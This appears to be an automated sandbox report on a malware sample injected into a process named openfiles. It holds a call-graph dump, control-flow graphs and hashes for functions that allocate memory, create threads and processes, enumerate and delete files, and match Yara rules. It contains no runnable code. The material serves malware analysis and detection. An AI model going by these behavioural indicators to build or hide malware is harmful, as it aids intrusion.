LdrInitializeThunk 94868->94873 94869->94868 94888 27b6d90 94869->94888 94872->94854 94877 27aa90b 94873->94877 94875 27aa8d4 94893 27b6e30 94875->94893 94876->94866 94877->94854 94903 27b3360 LdrInitializeThunk 94878->94903 94880 27aa8ee 94898 27b6f70 94880->94898 94883 27b7f5d 94882->94883 94884 27b7f6e CreateProcessInternalW 94883->94884 94884->94859 94886 27b7390 LdrInitializeThunk 94885->94886 94887 27a51be 94885->94887 94886->94887 94887->94878 94889 27b6e05 94888->94889 94890 27b6db7 94888->94890 94904 48e39b0 LdrInitializeThunk 94889->94904 94890->94875 94891 27b6e2a 94891->94875 94894 27b6ea2 94893->94894 94895 27b6e54 94893->94895 94905 48e4340 LdrInitializeThunk 94894->94905 94895->94880 94896 27b6ec7 94896->94880 94899 27b6f97 94898->94899 94900 27b6fe5 94898->94900 94899->94868 94906 48e2fb0 LdrInitializeThunk 94900->94906 94901 27b700a 94901->94868 94903->94876 94904->94891 94905->94896 94906->94901 94907 27b4b20 94908 27b4b7a 94907->94908 94910 27b4b87 94908->94910 94911 27b26c0 94908->94911 94912 27b99c0 NtAllocateVirtualMemory 94911->94912 94913 27b2701 94912->94913 94914 27a3f50 LdrLoadDll 94913->94914 94916 27b27fc 94913->94916 94917 27b2747 94914->94917 94915 27b2780 Sleep 94915->94917 94916->94910 94917->94915 94917->94916 94918 27a05e6 94919 27a059a 94918->94919 94920 27a05eb 94918->94920 94921 27a05d3 94919->94921 94922 27a05c0 PostThreadMessageW 94919->94922 94922->94921 94923 48e2ad0 LdrInitializeThunk 94924 2799350 94925 279935f 94924->94925 94926 27993a0 94925->94926 94927 279938d CreateThread 94925->94927 94928 279af10 94929 27b99c0 NtAllocateVirtualMemory 94928->94929 94930 279c581 94929->94930 94931 27a5290 94932 27a52a6 94931->94932 94933 27b71c0 LdrInitializeThunk 94932->94933 94934 27a52c6 94933->94934 94937 27b7be0 94934->94937 94936 27a52db 94938 27b7c64 94937->94938 94939 27b7c04 94937->94939 94942 48e2e80 LdrInitializeThunk 94938->94942 94939->94936 94940 27b7c95 94940->94936 94942->94940 94943 27aa1d0 94948 27a9f00 94943->94948 94945 27aa1dd 94962 27a9ba0 94945->94962 94947 27aa1f9 94949 27a9f25 94948->94949 94973 27a7880 94949->94973 94952 27aa062 94952->94945 94954 27aa079 94954->94945 94955 27aa070 94955->94954 94957 27aa161 94955->94957 94988 27a9600 94955->94988 94958 27aa1b9 94957->94958 94997 27a9960 94957->94997 94960 27b9a50 RtlFreeHeap 94958->94960 94961 27aa1c0 94960->94961 94961->94945 94963 27a9bb6 94962->94963 94969 27a9bc1 94962->94969 94964 27b9b30 RtlAllocateHeap 94963->94964 94964->94969 94965 27a9bd7 94965->94947 94966 27a7880 GetFileAttributesW 94966->94969 94967 27a9ece 94968 27a9ee7 94967->94968 94970 27b9a50 RtlFreeHeap 94967->94970 94968->94947 94969->94965 94969->94966 94969->94967 94971 27a9600 RtlFreeHeap 94969->94971 94972 27a9960 RtlFreeHeap 94969->94972 94970->94968 94971->94969 94972->94969 94974 27a78a1 94973->94974 94975 27a78a8 GetFileAttributesW 94974->94975 94976 27a78b3 94974->94976 94975->94976 94976->94952 94977 27b1fa0 94976->94977 94978 27b1fae 94977->94978 94979 27b1fb5 94977->94979 94978->94955 94980 27a3f50 LdrLoadDll 94979->94980 94981 27b1fea 94980->94981 94982 27b1ff9 94981->94982 95001 27b1a70 LdrLoadDll 94981->95001 94983 27b9b30 RtlAllocateHeap 94982->94983 94987 27b2194 94982->94987 94986 27b2012 94983->94986 94985 27b9a50 RtlFreeHeap 94985->94987 94986->94985 94986->94987 94987->94955 94989 27a9626 94988->94989 95002 27ace40 94989->95002 94991 27a968d 94993 27a9810 94991->94993 94995 27a96ab 94991->94995 94992 27a97f5 94992->94955 94993->94992 94994 27a94c0 RtlFreeHeap 94993->94994 94994->94993 94995->94992 95007 27a94c0 94995->95007 94998 27a9986 94997->94998 94999 27ace40 RtlFreeHeap 94998->94999 95000 27a9a02 94999->95000 95000->94957 95001->94982 95004 27ace56 95002->95004 95003 27ace63 95003->94991 95004->95003 95005 27b9a50 RtlFreeHeap 95004->95005 95006 27ace9c 95005->95006 95006->94991 95008 27a94d6 95007->95008 95011 27aceb0 95008->95011 95010 27a95dc 95010->94995 95012 27aced4 95011->95012 95013 27acf6c 95012->95013 95014 27b9a50 RtlFreeHeap 95012->95014 95013->95010 95014->95013 95015 27b7010 95016 27b7094 95015->95016 95018 27b7034 95015->95018 95020 48e2ee0 LdrInitializeThunk 95016->95020 95017 27b70c5 95020->95017 95021 27b0cd0 95025 27b0cdf 95021->95025 95022 27b0d26 95023 27b9a50 RtlFreeHeap 95022->95023 95024 27b0d36 95023->95024 95025->95022 95026 27b0d64 95025->95026 95028 27b0d69 95025->95028 95027 27b9a50 RtlFreeHeap 95026->95027 95027->95028 95029 27bab90 95030 27b9a50 RtlFreeHeap 95029->95030 95031 27baba5 95030->95031 95034 27a21ce 95035 27a5a70 2 API calls 95034->95035 95036 27a2213 95035->95036 95037 27a5200 95038 27a7630 LdrInitializeThunk 95037->95038 95039 27a5230 95038->95039 95041 27a525c 95039->95041 95042 27a75b0 95039->95042 95043 27a75f4 95042->95043 95044 27a7615 95043->95044 95049 27b6ed0 95043->95049 95044->95039 95046 27a7605 95047 27a7621 95046->95047 95048 27b7b50 NtClose 95046->95048 95047->95039 95048->95044 95050 27b6f45 95049->95050 95052 27b6ef7 95049->95052 95054 48e4650 LdrInitializeThunk 95050->95054 95051 27b6f6a 95051->95046 95052->95046 95054->95051 95055 27a6ac0 95056 27a6b32 95055->95056 95057 27a6ad8 95055->95057 95057->95056 95058 27aa6d0 9 API calls 95057->95058 95058->95056 95059 27b04c1 95071 27b79c0 95059->95071 95061 27b04e2 95062 27b0500 95061->95062 95063 27b0515 95061->95063 95065 27b7b50 NtClose 95062->95065 95064 27b7b50 NtClose 95063->95064 95068 27b051e 95064->95068 95066 27b0509 95065->95066 95067 27b054a 95068->95067 95069 27b9a50 RtlFreeHeap 95068->95069 95070 27b053e 95069->95070 95072 27b7a5c 95071->95072 95074 27b79e4 95071->95074 95073 27b7a72 NtReadFile 95072->95073 95073->95061 95074->95061 95075 27af340 95076 27af35d 95075->95076 95077 27a3f50 LdrLoadDll 95076->95077 95078 27af37b 95077->95078 95084 27b0940 95085 27b095c 95084->95085 95086 27b0998 95085->95086 95087 27b0984 95085->95087 95089 27b7b50 NtClose 95086->95089 95088 27b7b50 NtClose 95087->95088 95090 27b098d 95088->95090 95091 27b09a1 95089->95091 95094 27b9b70 RtlAllocateHeap 95091->95094 95093 27b09ac 95094->95093

                                                                                                Executed Functions

                                                                                                Function 027993B0 Relevance: 26.7, Strings: 21, Instructions: 405COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 26 27993b0-2799607 27 279960e-2799615 26->27 28 2799647-279964e 27->28 29 2799617-2799645 27->29 30 2799680-2799687 28->30 31 2799650-279967e 28->31 29->27 32 279968d-2799697 30->32 31->28 33 2799699-27996b8 32->33 34 27996cb-27996dc 32->34 36 27996c9 33->36 37 27996ba-27996c3 33->37 35 27996ed-27996f9 34->35 38 27996fb-2799708 35->38 39 279970a-2799711 35->39 36->32 37->36 38->35 41 2799713-2799730 39->41 42 2799732-279973c 39->42 41->39 43 279974d-2799759 42->43 44 279975b-2799764 43->44 45 2799766-2799770 43->45 44->43 47 2799772-2799791 45->47 48 27997a4 45->48 49 2799793-279979c 47->49 50 27997a2 47->50 51 27997ab-27997b5 48->51 49->50 50->45 52 27997e8 51->52 53 27997b7-27997d6 51->53 56 27997ef-27997f8 52->56 54 27997d8-27997e0 53->54 55 27997e6 53->55 54->55 55->51 57 27997fa-279980c 56->57 58 279980e-2799818 56->58 57->56 59 2799829-2799835 58->59 60 2799842-279984c 59->60 61 2799837-2799840 59->61 63 279985d-2799869 60->63 61->59 64 279986b-2799878 63->64 65 279987a-2799883 63->65 64->63 67 2799889-2799890 65->67 68 2799aab-2799ab2 65->68 69 2799892-27998b5 67->69 70 27998b7-27998cf 67->70 71 2799b0e-2799b18 68->71 72 2799ab4-2799abe 68->72 69->67 74 27998d1-27998db 70->74 75 2799942-279994e 70->75 76 2799b29-2799b32 71->76 73 2799acf-2799ad8 72->73 77 2799ada-2799aec 73->77 78 2799aee call 27b96c0 73->78 79 27998ec-27998f5 74->79 82 2799950-2799971 75->82 83 2799973-279997a 75->83 80 2799b3f-2799b49 76->80 81 2799b34-2799b3d 76->81 84 2799ac0-2799ac9 77->84 93 2799af3-2799b0c 78->93 86 279990c-2799913 79->86 87 27998f7-279990a 79->87 81->76 82->75 89 279997c-27999af 83->89 90 27999b1-27999b8 83->90 84->73 95 279993d 86->95 96 2799915-2799927 86->96 87->79 89->83 91 27999ba-27999de 90->91 92 2799a05-2799a0b 90->92 97 27999ef-2799a03 91->97 98 27999e0-27999e9 91->98 99 2799a0f-2799a13 92->99 93->71 93->93 95->68 100 2799929-279992d 96->100 101 279992e-2799930 96->101 97->90 98->97 102 2799a15-2799a32 99->102 103 2799a34-2799a3b 99->103 100->101 104 279993b 101->104 105 2799932-2799938 101->105 102->99 106 2799a68-2799a72 103->106 107 2799a3d-2799a66 103->107 104->86 105->104 108 2799a83-2799a8f 106->108 107->103 109 2799a91-2799aa4 108->109 110 2799aa6 108->110 109->108 110->65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !$#P$'f$5$A$E]$GV$LS$Lq$M5$V^$W]$]Q$df$hGdf$n$r$s5'f$u$wz$Y
                                                                                                • API String ID: 0-2442523001
                                                                                                • Opcode ID: 767faf5db65cfa230169c3ce95d9430cdd16fe41c7ba38623972b07f8d2c1127
                                                                                                • Instruction ID: fccd20708ba4a8cc67cb7a546edbcce219c824617234cd6348795b630d358c5f
                                                                                                • Opcode Fuzzy Hash: 767faf5db65cfa230169c3ce95d9430cdd16fe41c7ba38623972b07f8d2c1127
                                                                                                • Instruction Fuzzy Hash: EA22CFB0D05229CBEF24CF49D895BDDBBB2FB84308F1081D9D2496B291DBB95A84CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027AB970 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 027ABA54
                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 027ABA8F
                                                                                                • FindClose.KERNELBASE(?), ref: 027ABA9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                • String ID:
                                                                                                • API String ID: 3541575487-0
                                                                                                • Opcode ID: 71f03317308352be117bacee3b149174ec4786e4d6dbdb6adfdad83eae5caf8b
                                                                                                • Instruction ID: 8d635c106d570f80c28352d630027668bd5192fa937c0d09c34dd840a9159a3b
                                                                                                • Opcode Fuzzy Hash: 71f03317308352be117bacee3b149174ec4786e4d6dbdb6adfdad83eae5caf8b
                                                                                                • Instruction Fuzzy Hash: 49319071A00309ABDB21DB60CC99FEF777CAF94718F104558B909A7180EB70AA94CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7860 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 027B7956
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction ID: ff44987998252d4f6b8720edb2424068a96534da4ee2e5b232c15993219970f2
                                                                                                • Opcode Fuzzy Hash: b141b2ea81ff45f7cc1e302a86f572fd564148939d79fb991bcaded83421ced7
                                                                                                • Instruction Fuzzy Hash: DD31D2B5A00209AFCB15DF99D880EEFB7B9AF8C310F108219F918A3240D730A951CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B79C0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 027B7A9B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction ID: f7b9656de3633a703fd5eb6652a2c1d34ff9f68e5e1908bd5616b2f3df53bac8
                                                                                                • Opcode Fuzzy Hash: d941a54131e1416f7037e37ed3abe75ef1dd9fda57762ad5d2bddd2f986665ad
                                                                                                • Instruction Fuzzy Hash: D031C5B5A00209AFDB15DF59D880EEFB7B9EF8D314F108609F918A7240D670A9118FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7CA0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtAllocateVirtualMemory.NTDLL(027A14BE,?,027B68E7,00000000,00000004,00003000,?,?,?,?,?,027B68E7,027A14BE,?,027B68E7,00000000), ref: 027B7D5D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 2167126740-0
                                                                                                • Opcode ID: 7e6ef78cdfbc0ad8ea219b2f708962f147a841bbf8e6734ec7711df11bb163b8
                                                                                                • Instruction ID: 4a360fad4b5f9d0717bcef8a8f0f1c17ad7d701fed8dd0ba93b43d0fe9b80088
                                                                                                • Opcode Fuzzy Hash: 7e6ef78cdfbc0ad8ea219b2f708962f147a841bbf8e6734ec7711df11bb163b8
                                                                                                • Instruction Fuzzy Hash: 0121F6B5A00609AFDB15EF59DC81FEBB7ADEF89310F00850AFD18A7240D770A911CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7AB0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteFile
                                                                                                • String ID:
                                                                                                • API String ID: 4033686569-0
                                                                                                • Opcode ID: 61ee255c864caa6baa2e816f9a7872553526579f11e20c66d3257f09a33f6cd1
                                                                                                • Instruction ID: 27bd9d883fd9b9f207bbe77b2613c27663a32f0ab18a87d86385f54a30f16b54
                                                                                                • Opcode Fuzzy Hash: 61ee255c864caa6baa2e816f9a7872553526579f11e20c66d3257f09a33f6cd1
                                                                                                • Instruction Fuzzy Hash: 49018E72600204BFDA11AB64DC45FEB73ADEF85710F00450AFA59A7280DBB07A11CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 027B7B50 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 027B7B87
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction ID: 2d4b6d1867d06fe27b0ef611e34a7c3538a8454b320a9b7246fbddfdc3755d66
                                                                                                • Opcode Fuzzy Hash: 21b45c6fd79cad047264b73198e4d8442247cd6b166523d33cd501c473cbfad0
                                                                                                • Instruction Fuzzy Hash: 07E046362002047FDA21AB6ADC41F9BB7ADDFC6764F408516FA8CAB240C770B9118BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: f018fd133f1562e6c9c4f89b22465f7c7fe3d76debe3dfe3bb9b5bbba68a657c
                                                                                                • Instruction ID: e3c638b3e962406541efebd0a3f45118f1521e7fa1a0960ddaed81b1adaa53ee
                                                                                                • Opcode Fuzzy Hash: f018fd133f1562e6c9c4f89b22465f7c7fe3d76debe3dfe3bb9b5bbba68a657c
                                                                                                • Instruction Fuzzy Hash: BC90026160150046664071584C044066005DBE2305395C615A255D560C8718D9A9926A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 77382c5dd195b58810c1f08876f3ca9a6e038c7d3f6abcba5a68db9f5578026f
                                                                                                • Instruction ID: 966b36920291fb31c8d85de5be90843bc84d9c3e39c997dccc96ac26010b50d3
                                                                                                • Opcode Fuzzy Hash: 77382c5dd195b58810c1f08876f3ca9a6e038c7d3f6abcba5a68db9f5578026f
                                                                                                • Instruction Fuzzy Hash: AA90023160580016B64071584C845464005DBE1305B55C511E242D554C8B14DAAA5362
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 9a27dffd67e957edf06fff21e0cb0b8bdf7de57cca46924f47a750935881a15b
                                                                                                • Instruction ID: 7b885f49eac18f5312850112890b756ac8cc90d404e4b2353fedded8cba88220
                                                                                                • Opcode Fuzzy Hash: 9a27dffd67e957edf06fff21e0cb0b8bdf7de57cca46924f47a750935881a15b
                                                                                                • Instruction Fuzzy Hash: BD90023120140406F600759858086460005CBE1305F55D511A702D555EC765D9E56132
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d4afe45649529311af02865679f8284d4b63c6a78a757a1f285327032fc0994d
                                                                                                • Instruction ID: 6745f7061e7c9f3ae7a8536bf1f110c943efaed96c492c42b12e3f32c562bb43
                                                                                                • Opcode Fuzzy Hash: d4afe45649529311af02865679f8284d4b63c6a78a757a1f285327032fc0994d
                                                                                                • Instruction Fuzzy Hash: 8090023120140846F60071584804B460005CBE1305F55C516A212D654D8715D9A57522
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 88f242dff307cde0c8a8da3070a3b4371203fdbea5eb6d5a8b0019f24f97c702
                                                                                                • Instruction ID: b6d9237081158ee265de334946997f62daa2e9a0d2050114e91434063ad35eac
                                                                                                • Opcode Fuzzy Hash: 88f242dff307cde0c8a8da3070a3b4371203fdbea5eb6d5a8b0019f24f97c702
                                                                                                • Instruction Fuzzy Hash: 4690023120148806F6107158880474A0005CBD1305F59C911A642D658D8795D9E57122
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b6cf531bcd84cc3443f086f5fd4fcf37e5b762a15a025373302c1acfbee4b15a
                                                                                                • Instruction ID: e4ba3fc056450714aa2943b88664c53116c197d9acc6256d8fcffb38bdca2051
                                                                                                • Opcode Fuzzy Hash: b6cf531bcd84cc3443f086f5fd4fcf37e5b762a15a025373302c1acfbee4b15a
                                                                                                • Instruction Fuzzy Hash: D2900221242441567A45B15848045074006DBE1245795C512A341D950C8726E9AAD622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b286daea7392ee1585e50d362304ee5bd4aa632ada0a8e2c90958b5f39910ffd
                                                                                                • Instruction ID: 192e2bcd3bc008000c01a4fefd22f3663c98d27e4718b59a9cd5c12373d8285a
                                                                                                • Opcode Fuzzy Hash: b286daea7392ee1585e50d362304ee5bd4aa632ada0a8e2c90958b5f39910ffd
                                                                                                • Instruction Fuzzy Hash: 1890023120140417F611715849047070009CBD1245F95C912A242D558D9756DAA6A122
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 048E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ba1656b8f452556bd395d993c360c1e9d4d1c782cf9a1bea3a586d4ae4d885a2
                                                                                                • Instruction ID: baa9a11ea24d9eac5f5daf023b6c2bad9cc4cd0cd12bbdfc74b51cc4e1af71e2
                                                                                                • Opcode Fuzzy Hash: ba1656b8f452556bd395d993c360c1e9d4d1c782cf9a1bea3a586d4ae4d885a2
                                                                                                • Instruction Fuzzy Hash: 0F90022921340006F6807158580860A0005CBD2206F95D915A201E558CCB15D9BD5322
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

